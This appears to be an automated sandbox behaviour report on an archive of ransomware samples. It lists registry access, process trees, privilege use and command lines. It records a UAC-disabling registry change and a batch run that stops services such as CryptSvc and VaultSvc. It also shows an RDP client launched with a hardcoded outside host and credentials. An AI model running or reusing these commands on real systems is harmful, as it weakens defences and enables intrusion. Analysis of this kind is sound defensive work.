TsCredentials.exeimages.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exeTrojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exeConnectionClient.exemstsc.exeTsCredentials.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.execmd.exeHEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exeHEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exeTrojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exeTrojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exeTsCredentials.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TsCredentials.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ConnectionClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TsCredentials.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TsCredentials.exe -
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exemstsc.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\TSRedirFlags mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Device Parameters mstsc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\Device Parameters mstsc.exe Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters mstsc.exe Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters mstsc.exe -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exeipconfig.exepid Process 4548 ipconfig.exe 5020 ipconfig.exe 4568 ipconfig.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstsc.exepid Process 4704 mstsc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exetaskmgr.exepowershell.exepid Process 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
7zFM.exetaskmgr.exepid Process 2936 7zFM.exe 4176 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepowershell.exedescription pid Process Token: SeRestorePrivilege 2936 7zFM.exe Token: 35 2936 7zFM.exe Token: SeSecurityPrivilege 2936 7zFM.exe Token: SeDebugPrivilege 4840 taskmgr.exe Token: SeSystemProfilePrivilege 4840 taskmgr.exe Token: SeCreateGlobalPrivilege 4840 taskmgr.exe Token: SeDebugPrivilege 4176 taskmgr.exe Token: SeSystemProfilePrivilege 4176 taskmgr.exe Token: SeCreateGlobalPrivilege 4176 taskmgr.exe Token: 33 4840 taskmgr.exe Token: SeIncBasePriorityPrivilege 4840 taskmgr.exe Token: SeDebugPrivilege 220 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepid Process 2936 7zFM.exe 2936 7zFM.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exetaskmgr.exepid Process 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4840 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe 4176 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
mstsc.exepid Process 4704 mstsc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
taskmgr.exepowershell.execmd.exeTrojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exeTrojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exeConnectionClient.exemstsc.exeTrojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exeimages.execmd.exedescription pid Process procid_target PID 4840 wrote to memory of 4176 4840 taskmgr.exe 102 PID 4840 wrote to memory of 4176 4840 taskmgr.exe 102 PID 220 wrote to memory of 2936 220 powershell.exe 109 PID 220 wrote to memory of 2936 220 powershell.exe 109 PID 2936 wrote to memory of 2304 2936 cmd.exe 110 PID 2936 wrote to memory of 2304 2936 cmd.exe 110 PID 2936 wrote to memory of 2304 2936 cmd.exe 110 PID 2936 wrote to memory of 748 2936 cmd.exe 111 PID 2936 wrote to memory of 748 2936 cmd.exe 111 PID 2936 wrote to memory of 748 2936 cmd.exe 111 PID 2936 wrote to memory of 2668 2936 cmd.exe 112 PID 2936 wrote to memory of 2668 2936 cmd.exe 112 PID 2936 wrote to memory of 2668 2936 cmd.exe 112 PID 2936 wrote to memory of 2636 2936 cmd.exe 113 PID 2936 wrote to memory of 2636 2936 cmd.exe 113 PID 2936 wrote to memory of 2636 2936 cmd.exe 113 PID 2936 wrote to memory of 2648 2936 cmd.exe 114 PID 2936 wrote to memory of 2648 2936 cmd.exe 114 PID 2936 wrote to memory of 2648 2936 cmd.exe 114 PID 2936 wrote to memory of 3756 2936 cmd.exe 115 PID 2936 wrote to memory of 3756 2936 cmd.exe 115 PID 2936 wrote to memory of 3756 2936 cmd.exe 115 PID 3756 wrote to memory of 3880 3756 Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe 118 PID 3756 wrote to memory of 3880 3756 Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe 118 PID 2936 wrote to memory of 4404 2936 cmd.exe 117 PID 2936 wrote to memory of 4404 2936 cmd.exe 117 PID 2936 wrote to memory of 4404 2936 cmd.exe 117 PID 2936 wrote to memory of 2004 2936 cmd.exe 121 PID 2936 wrote to memory of 2004 2936 cmd.exe 121 PID 2648 wrote to memory of 3736 2648 Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe 122 PID 2648 wrote to memory of 3736 2648 Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe 122 PID 2648 wrote to memory of 3736 2648 Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe 122 PID 3736 wrote to memory of 4676 3736 ConnectionClient.exe 124 PID 3736 wrote to memory of 4676 3736 ConnectionClient.exe 124 PID 3736 wrote to memory of 4676 3736 ConnectionClient.exe 124 PID 3736 wrote to memory of 2528 3736 ConnectionClient.exe 126 PID 3736 wrote to memory of 2528 3736 ConnectionClient.exe 126 PID 3736 wrote to memory of 2528 3736 ConnectionClient.exe 126 PID 3736 wrote to memory of 3280 3736 ConnectionClient.exe 128 PID 3736 wrote to memory of 3280 3736 ConnectionClient.exe 128 PID 3736 wrote to memory of 3280 3736 ConnectionClient.exe 128 PID 3280 wrote to memory of 4704 3280 mstsc.exe 129 PID 3280 wrote to memory of 4704 3280 mstsc.exe 129 PID 4404 wrote to memory of 1376 4404 Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe 131 PID 4404 wrote to memory of 1376 4404 Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe 131 PID 4404 wrote to memory of 1376 4404 Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe 131 PID 1376 wrote to memory of 3716 1376 images.exe 133 PID 1376 wrote to memory of 3716 1376 images.exe 133 PID 1376 wrote to memory of 3716 1376 images.exe 133 PID 1376 wrote to memory of 3716 1376 images.exe 133 PID 1376 wrote to memory of 3716 1376 images.exe 133 PID 3880 wrote to memory of 4568 3880 cmd.exe 135 PID 3880 wrote to memory of 4568 3880 cmd.exe 135 PID 3880 wrote to memory of 4548 3880 cmd.exe 136 PID 3880 wrote to memory of 4548 3880 cmd.exe 136 PID 3880 wrote to memory of 5020 3880 cmd.exe 137 PID 3880 wrote to memory of 5020 3880 cmd.exe 137 PID 3880 wrote to memory of 1612 3880 cmd.exe 138 PID 3880 wrote to memory of 1612 3880 cmd.exe 138 PID 3880 wrote to memory of 2892 3880 cmd.exe 139 PID 3880 wrote to memory of 2892 3880 cmd.exe 139 PID 3880 wrote to memory of 4508 3880 cmd.exe 140 PID 3880 wrote to memory of 4508 3880 cmd.exe 140 PID 3880 wrote to memory of 1104 3880 cmd.exe 141 -
System policy modification 1 TTPs 2 IoCs
Processes:
ConnectionClient.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System ConnectionClient.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ConnectionClient.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 3756 attrib.exe 2216 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00414.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2936
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exeHEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2304
-
-
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:748 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 13204⤵
- Program crash
PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 19124⤵
- Program crash
PID:4644
-
-
-
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2668
-
-
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exeHEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2636
-
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exeTrojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Users\Admin\RDP6\ConnectionClient.exe"C:\Users\Admin\RDP6\ConnectionClient.exe" -server fmea.homepc.it -user rileva1 -psw newfmea -color 32 -alttab 0 -remoteapp off -seamless off -width 1024 -height 768 -printer off -com off -smartcard off -preview on -disk on -smartsizing 0 -localtb 324⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3736 -
C:\Users\Admin\RDP6\TsCredentials.exe"C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it /Delete5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4676
-
-
C:\Users\Admin\RDP6\TsCredentials.exe"C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it rileva1 newfmea5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2528
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe" "C:\Users\Admin\RDP6\Session.rdp"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\system32\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe" "C:\Users\Admin\RDP6\Session.rdp"6⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4704
-
-
-
C:\Users\Admin\RDP6\TsCredentials.exe"C:\Users\Admin\RDP6\TsCredentials.exe" fmea.homepc.it /Delete5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2760
-
-
-
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exeTrojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6491.tmp\64A2.bat C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\system32\ipconfig.exeipconfig /release5⤵
- Gathers network information
PID:4568
-
-
C:\Windows\system32\ipconfig.exeipconfig /renew5⤵
- Gathers network information
PID:4548
-
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns5⤵
- Gathers network information
PID:5020
-
-
C:\Windows\system32\netsh.exenetsh int tcp show global5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1612
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global chimney=enabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2892
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global autotuninglevel=normal5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4508
-
-
C:\Windows\system32\netsh.exenetsh interface tcp set heuristics disabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1104
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global dca=enabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:832
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global netdma=enabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4436
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global rss=enabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4948
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global rsc=enabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4912
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global ecncapability=disabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2236
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global initialRto=20005⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2028
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global timestamps=disabled5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Time Discovery
PID:1940
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global nonsackrttresiliency=disabled5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3112
-
-
C:\Windows\system32\netsh.exenetsh int tcp set global maxsynretransmissions=25⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3572
-
-
C:\Windows\system32\sc.exeSC CONFIG "ALG" start= disabled5⤵PID:4092
-
-
C:\Windows\system32\sc.exesc stop "ALG"5⤵
- Launches sc.exe
PID:4956
-
-
C:\Windows\system32\sc.exesc config "bthserv" start= disabled5⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\system32\sc.exesc stop "bthserv"5⤵
- Launches sc.exe
PID:4800
-
-
C:\Windows\system32\sc.exesc config "BthHFSrv" start= disabled5⤵
- Launches sc.exe
PID:3984
-
-
C:\Windows\system32\sc.exesc stop "BthHFSrv"5⤵
- Launches sc.exe
PID:3860
-
-
C:\Windows\system32\sc.exesc config "PeerDistSvc" start= disabled5⤵
- Launches sc.exe
PID:3172
-
-
C:\Windows\system32\sc.exesc stop "PeerDistSvc"5⤵
- Launches sc.exe
PID:3404
-
-
C:\Windows\system32\sc.exesc config "CertPropSvc" start= disabled5⤵
- Launches sc.exe
PID:1316
-
-
C:\Windows\system32\sc.exesc stop "CertPropSvc"5⤵
- Launches sc.exe
PID:3520
-
-
C:\Windows\system32\sc.exesc config "VaultSvc" start= disabled5⤵
- Launches sc.exe
PID:624
-
-
C:\Windows\system32\sc.exesc stop "VaultSvc"5⤵
- Launches sc.exe
PID:468
-
-
C:\Windows\system32\sc.exesc config "CryptSvc" start= disabled5⤵
- Launches sc.exe
PID:4364
-
-
C:\Windows\system32\sc.exesc stop "CryptSvc"5⤵
- Launches sc.exe
PID:952
-
-
C:\Windows\system32\sc.exesc config "TrkWks" start= disabled5⤵
- Launches sc.exe
PID:1224
-
-
C:\Windows\system32\sc.exesc stop "TrkWks"5⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\system32\sc.exesc config "DiagTrack" start= disabled5⤵
- Launches sc.exe
PID:4972
-
-
C:\Windows\system32\sc.exesc stop "DiagTrack"5⤵
- Launches sc.exe
PID:1124
-
-
C:\Windows\system32\sc.exesc config "WPCSvc" start= disabled5⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\sc.exesc stop "WPCSvc"5⤵
- Launches sc.exe
PID:388
-
-
C:\Windows\system32\sc.exesc config "HomeGroupListener" start= disabled5⤵
- Launches sc.exe
PID:3288
-
-
C:\Windows\system32\sc.exesc stop "HomeGroupListener"5⤵
- Launches sc.exe
PID:1104
-
-
C:\Windows\system32\sc.exesc config "HomeGroupProvider" start= disabled5⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\system32\sc.exesc stop "HomeGroupProvider"5⤵
- Launches sc.exe
PID:832
-
-
C:\Windows\system32\sc.exesc config "hidserv" start= disabled5⤵
- Launches sc.exe
PID:2404
-
-
C:\Windows\system32\sc.exesc stop "hidserv"5⤵
- Launches sc.exe
PID:4924
-
-
C:\Windows\system32\sc.exesc config "vmicvss" start= disabled5⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\sc.exesc stop "vmicvss"5⤵
- Launches sc.exe
PID:2284
-
-
C:\Windows\system32\sc.exesc config "vmictimesync" start= disabled5⤵
- Launches sc.exe
PID:664
-
-
C:\Windows\system32\sc.exesc stop "vmictimesync"5⤵
- Launches sc.exe
PID:4500
-
-
C:\Windows\system32\sc.exesc config "vmicrdv" start= disabled5⤵
- Launches sc.exe
PID:4236
-
-
C:\Windows\system32\sc.exesc stop "vmicrdv"5⤵
- Launches sc.exe
PID:4644
-
-
C:\Windows\system32\sc.exesc config "vmicheartbeat" start= disabled5⤵
- Launches sc.exe
PID:1664
-
-
C:\Windows\system32\sc.exesc stop "vmicheartbeat"5⤵
